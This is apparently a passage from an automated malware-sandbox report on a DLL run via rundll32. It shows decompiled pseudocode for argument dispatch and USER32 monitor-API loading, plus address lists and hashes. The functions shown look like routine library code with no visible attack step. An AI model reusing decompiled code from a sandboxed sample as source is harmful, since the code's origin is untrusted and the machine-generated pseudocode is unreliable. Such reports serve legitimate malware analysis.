						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10014517(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E100012C0(__ecx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E100201BD(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

































                                                                                                                      0x1002db49
                                                                                                                      0x1002db50
                                                                                                                      0x1002db55
                                                                                                                      0x1002db58
                                                                                                                      0x1002db5c
                                                                                                                      0x1002e035
                                                                                                                      0x1002e03a
                                                                                                                      0x1002e03a
                                                                                                                      0x1002db62
                                                                                                                      0x1002db65
                                                                                                                      0x1002db68
                                                                                                                      0x1002db6b
                                                                                                                      0x1002db75
                                                                                                                      0x1002db78
                                                                                                                      0x1002db7d
                                                                                                                      0x1002db83
                                                                                                                      0x1002db8e
                                                                                                                      0x1002db8e
                                                                                                                      0x1002db95
                                                                                                                      0x1002db9c
                                                                                                                      0x1002dba1
                                                                                                                      0x1002dba8
                                                                                                                      0x1002dba8
                                                                                                                      0x1002dbab
                                                                                                                      0x1002dbb2
                                                                                                                      0x1002dbb5
                                                                                                                      0x1002dbb8
                                                                                                                      0x1002dbbb
                                                                                                                      0x1002dbbe
                                                                                                                      0x1002dbc1
                                                                                                                      0x1002dbc5
                                                                                                                      0x1002dbc9
                                                                                                                      0x1002dbca
                                                                                                                      0x1002ddea
                                                                                                                      0x1002ddee
                                                                                                                      0x1002ddf0
                                                                                                                      0x1002ddf9
                                                                                                                      0x1002ddfb
                                                                                                                      0x1002ddfb
                                                                                                                      0x1002de08
                                                                                                                      0x1002de10
                                                                                                                      0x1002de12
                                                                                                                      0x1002de27
                                                                                                                      0x1002de3e
                                                                                                                      0x1002de41
                                                                                                                      0x1002de46
                                                                                                                      0x1002de4b
                                                                                                                      0x1002de76
                                                                                                                      0x1002de76
                                                                                                                      0x1002de79
                                                                                                                      0x1002de82
                                                                                                                      0x1002de85
                                                                                                                      0x1002df5a
                                                                                                                      0x1002df5a
                                                                                                                      0x1002df60
                                                                                                                      0x1002e017
                                                                                                                      0x1002e01a
                                                                                                                      0x1002e01e
                                                                                                                      0x1002e023
                                                                                                                      0x1002e027
                                                                                                                      0x1002e02a
                                                                                                                      0x1002e02c
                                                                                                                      0x1002e02f
                                                                                                                      0x1002e034
                                                                                                                      0x00000000
                                                                                                                      0x1002e02a
                                                                                                                      0x1002df6a
                                                                                                                      0x1002df8f
                                                                                                                      0x1002df92
                                                                                                                      0x1002df95
                                                                                                                      0x1002df98
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002df9a
                                                                                                                      0x00000000
                                                                                                                      0x1002dfab
                                                                                                                      0x1002dfb2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002e00f
                                                                                                                      0x1002e012
                                                                                                                      0x1002e015
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfca
                                                                                                                      0x1002dfcd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfd4
                                                                                                                      0x1002dfd7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfb7
                                                                                                                      0x1002dfba
                                                                                                                      0x1002dfbd
                                                                                                                      0x1002dfbf
                                                                                                                      0x1002dfc2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfe1
                                                                                                                      0x1002dfe6
                                                                                                                      0x1002dfe9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dff1
                                                                                                                      0x1002dff4
                                                                                                                      0x1002dff6
                                                                                                                      0x1002dffa
                                                                                                                      0x1002dffd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002e001
                                                                                                                      0x1002e004
                                                                                                                      0x1002e007
                                                                                                                      0x1002e008
                                                                                                                      0x1002e009
                                                                                                                      0x1002e00a
                                                                                                                      0x1002e00b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfa7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002df9a
                                                                                                                      0x1002df6e
                                                                                                                      0x1002df73
                                                                                                                      0x1002df79
                                                                                                                      0x1002df7b
                                                                                                                      0x1002df7d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002df83
                                                                                                                      0x1002df89
                                                                                                                      0x1002dea1
                                                                                                                      0x1002dea1
                                                                                                                      0x1002dea6
                                                                                                                      0x1002dea6
                                                                                                                      0x1002dea9
                                                                                                                      0x1002deb2
                                                                                                                      0x1002deb2
                                                                                                                      0x1002deb7
                                                                                                                      0x1002debd
                                                                                                                      0x1002dec0
                                                                                                                      0x1002dec2
                                                                                                                      0x1002dec6
                                                                                                                      0x1002dec8
                                                                                                                      0x1002ded0
                                                                                                                      0x1002ded1
                                                                                                                      0x1002ded7
                                                                                                                      0x1002ded7
                                                                                                                      0x1002ded9
                                                                                                                      0x1002dedf
                                                                                                                      0x1002dee5
                                                                                                                      0x1002deed
                                                                                                                      0x1002def5
                                                                                                                      0x1002def8
                                                                                                                      0x1002def8
                                                                                                                      0x1002df03
                                                                                                                      0x1002df09
                                                                                                                      0x1002df0b
                                                                                                                      0x1002df12
                                                                                                                      0x1002df17
                                                                                                                      0x1002df1a
                                                                                                                      0x1002df1a
                                                                                                                      0x1002df22
                                                                                                                      0x1002df24
                                                                                                                      0x1002df2b
                                                                                                                      0x1002df30
                                                                                                                      0x1002df33
                                                                                                                      0x1002df33
                                                                                                                      0x1002df3b
                                                                                                                      0x1002df40
                                                                                                                      0x1002df46
                                                                                                                      0x1002df52
                                                                                                                      0x1002df55
                                                                                                                      0x00000000
                                                                                                                      0x1002df55
                                                                                                                      0x1002de8f
                                                                                                                      0x1002de95
                                                                                                                      0x1002de9c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002de9e
                                                                                                                      0x00000000
                                                                                                                      0x1002de4d
                                                                                                                      0x1002de50
                                                                                                                      0x1002de56
                                                                                                                      0x1002de71
                                                                                                                      0x1002de71
                                                                                                                      0x1002de74
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002de5c
                                                                                                                      0x1002de5e
                                                                                                                      0x1002de60
                                                                                                                      0x1002de66
                                                                                                                      0x1002de67
                                                                                                                      0x1002de6d
                                                                                                                      0x1002de6d
                                                                                                                      0x1002de70
                                                                                                                      0x1002de70
                                                                                                                      0x00000000
                                                                                                                      0x1002de70
                                                                                                                      0x1002de62
                                                                                                                      0x1002de64
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002de64
                                                                                                                      0x00000000
                                                                                                                      0x1002de71
                                                                                                                      0x1002dbd0
                                                                                                                      0x1002dbd4
                                                                                                                      0x1002dbd5
                                                                                                                      0x1002dbe4
                                                                                                                      0x1002dbef
                                                                                                                      0x1002dbf2
                                                                                                                      0x1002dbfa
                                                                                                                      0x1002dbfd
                                                                                                                      0x1002dc00
                                                                                                                      0x1002dc06
                                                                                                                      0x1002dc06
                                                                                                                      0x1002dc0a
                                                                                                                      0x1002dc0d
                                                                                                                      0x1002dc10
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc16
                                                                                                                      0x1002dc1b
                                                                                                                      0x1002dc1e
                                                                                                                      0x1002dc24
                                                                                                                      0x1002dc27
                                                                                                                      0x1002dc2a
                                                                                                                      0x1002dc2d
                                                                                                                      0x1002dc33
                                                                                                                      0x1002dc36
                                                                                                                      0x1002dc39
                                                                                                                      0x1002dc43
                                                                                                                      0x1002dc43
                                                                                                                      0x1002dc46
                                                                                                                      0x1002dc4e
                                                                                                                      0x1002dc50
                                                                                                                      0x1002dd6d
                                                                                                                      0x1002dd72
                                                                                                                      0x1002dd75
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dd77
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dd7e
                                                                                                                      0x1002dd81
                                                                                                                      0x1002dd83
                                                                                                                      0x1002dd89
                                                                                                                      0x1002dd93
                                                                                                                      0x1002dd9a
                                                                                                                      0x1002dd9c
                                                                                                                      0x1002dda8
                                                                                                                      0x1002ddac
                                                                                                                      0x1002ddb1
                                                                                                                      0x1002ddb5
                                                                                                                      0x1002ddb9
                                                                                                                      0x1002ddbb
                                                                                                                      0x1002ddbe
                                                                                                                      0x1002ddc3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc56
                                                                                                                      0x1002dc56
                                                                                                                      0x1002ddc6
                                                                                                                      0x1002ddc6
                                                                                                                      0x1002ddc9
                                                                                                                      0x1002ddc9
                                                                                                                      0x1002ddcd
                                                                                                                      0x00000000
                                                                                                                      0x1002ddcd
                                                                                                                      0x1002dc5d
                                                                                                                      0x1002dc61
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc67
                                                                                                                      0x00000000
                                                                                                                      0x1002dc7c
                                                                                                                      0x1002dc7f
                                                                                                                      0x1002dc81
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dca4
                                                                                                                      0x1002dca8
                                                                                                                      0x1002dcad
                                                                                                                      0x1002dcb0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dcb7
                                                                                                                      0x1002dcbb
                                                                                                                      0x1002dcc0
                                                                                                                      0x1002dcc3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dcca
                                                                                                                      0x1002dccd
                                                                                                                      0x1002dccf
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dcd3
                                                                                                                      0x1002dcd6
                                                                                                                      0x1002dcd8
                                                                                                                      0x1002dcda
                                                                                                                      0x1002dcdb
                                                                                                                      0x1002dcde
                                                                                                                      0x1002dce4
                                                                                                                      0x1002dce8
                                                                                                                      0x1002dcea
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dcf0
                                                                                                                      0x1002dcf2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dd45
                                                                                                                      0x1002dd48
                                                                                                                      0x1002dd4c
                                                                                                                      0x1002dd4e
                                                                                                                      0x1002dd50
                                                                                                                      0x1002dd50
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dd55
                                                                                                                      0x1002dd59
                                                                                                                      0x1002dd5c
                                                                                                                      0x1002dd5f
                                                                                                                      0x1002dd61
                                                                                                                      0x1002dd62
                                                                                                                      0x1002dd63
                                                                                                                      0x1002dd64
                                                                                                                      0x1002dd65
                                                                                                                      0x1002dd68
                                                                                                                      0x1002dd6a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dcfd
                                                                                                                      0x1002dcfd
                                                                                                                      0x1002dd00
                                                                                                                      0x1002dd02
                                                                                                                      0x1002dd04
                                                                                                                      0x1002dd05
                                                                                                                      0x1002dd08
                                                                                                                      0x1002dd0b
                                                                                                                      0x1002dd10
                                                                                                                      0x1002dd13
                                                                                                                      0x1002dd17
                                                                                                                      0x1002dd1d
                                                                                                                      0x1002dd21
                                                                                                                      0x1002dd23
                                                                                                                      0x1002dd29
                                                                                                                      0x1002dd29
                                                                                                                      0x1002dd2c
                                                                                                                      0x1002dd2f
                                                                                                                      0x1002dd32
                                                                                                                      0x1002dd37
                                                                                                                      0x1002dd3b
                                                                                                                      0x00000000
                                                                                                                      0x1002dd3b
                                                                                                                      0x1002dd25
                                                                                                                      0x1002dd27
                                                                                                                      0x1002dcf8
                                                                                                                      0x1002dcf8
                                                                                                                      0x00000000
                                                                                                                      0x1002dcf8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc6e
                                                                                                                      0x1002dc71
                                                                                                                      0x1002dc75
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc89
                                                                                                                      0x1002dc8c
                                                                                                                      0x1002dc8f
                                                                                                                      0x1002dc92
                                                                                                                      0x1002dc92
                                                                                                                      0x1002dc95
                                                                                                                      0x1002dc95
                                                                                                                      0x1002dc97
                                                                                                                      0x1002dc9c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc67
                                                                                                                      0x1002ddcf
                                                                                                                      0x1002ddcf
                                                                                                                      0x1002ddd3
                                                                                                                      0x1002ddd6
                                                                                                                      0x1002dddf
                                                                                                                      0x1002dddf
                                                                                                                      0x1002dde8
                                                                                                                      0x00000000
                                                                                                                      0x1002dde8

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E10018B59() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100572e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x100572e8 = E10018B01(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100572c8 = 0;
						 *0x100572cc = 0;
						 *0x100572d0 = 0;
						 *0x100572d4 = 0;
						 *0x100572d8 = 0;
						 *0x100572dc = 0;
						 *0x100572e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100572c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100572cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100572d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100572d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100572dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100572d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100572e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100572e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x100572d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                                      0x10018b5c
                                                                                                                      0x10018b62
                                                                                                                      0x10018b71
                                                                                                                      0x10018b7d
                                                                                                                      0x10018b88
                                                                                                                      0x10018b8a
                                                                                                                      0x10018b8c
                                                                                                                      0x10018c20
                                                                                                                      0x10018c20
                                                                                                                      0x10018c26
                                                                                                                      0x10018c2c
                                                                                                                      0x10018c32
                                                                                                                      0x10018c38
                                                                                                                      0x10018c3e
                                                                                                                      0x10018c44
                                                                                                                      0x10018c4a
                                                                                                                      0x10018b92
                                                                                                                      0x10018b9e
                                                                                                                      0x10018ba0
                                                                                                                      0x10018ba2
                                                                                                                      0x10018ba7
                                                                                                                      0x00000000
                                                                                                                      0x10018ba9
                                                                                                                      0x10018baf
                                                                                                                      0x10018bb1
                                                                                                                      0x10018bb3
                                                                                                                      0x10018bb8
                                                                                                                      0x00000000
                                                                                                                      0x10018bba
                                                                                                                      0x10018bc0
                                                                                                                      0x10018bc2
                                                                                                                      0x10018bc4
                                                                                                                      0x10018bc9
                                                                                                                      0x00000000
                                                                                                                      0x10018bcb
                                                                                                                      0x10018bd1
                                                                                                                      0x10018bd3
                                                                                                                      0x10018bd5
                                                                                                                      0x10018bda
                                                                                                                      0x00000000
                                                                                                                      0x10018bdc
                                                                                                                      0x10018be2
                                                                                                                      0x10018be4
                                                                                                                      0x10018be6
                                                                                                                      0x10018beb
                                                                                                                      0x00000000
                                                                                                                      0x10018bed
                                                                                                                      0x10018bf3
                                                                                                                      0x10018bf5
                                                                                                                      0x10018bf7
                                                                                                                      0x10018bfc
                                                                                                                      0x00000000
                                                                                                                      0x10018bfe
                                                                                                                      0x10018c04
                                                                                                                      0x10018c06
                                                                                                                      0x10018c08
                                                                                                                      0x10018c0d
                                                                                                                      0x00000000
                                                                                                                      0x10018c0f
                                                                                                                      0x10018c11
                                                                                                                      0x10018c11
                                                                                                                      0x10018c11
                                                                                                                      0x10018c0d
                                                                                                                      0x10018bfc
                                                                                                                      0x10018beb
                                                                                                                      0x10018bda
                                                                                                                      0x10018bc9
                                                                                                                      0x10018bb8
                                                                                                                      0x10018ba7
                                                                                                                      0x10018c14
                                                                                                                      0x10018c1f
                                                                                                                      0x10018b64
                                                                                                                      0x10018b66
                                                                                                                      0x10018b70
                                                                                                                      0x10018b70

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
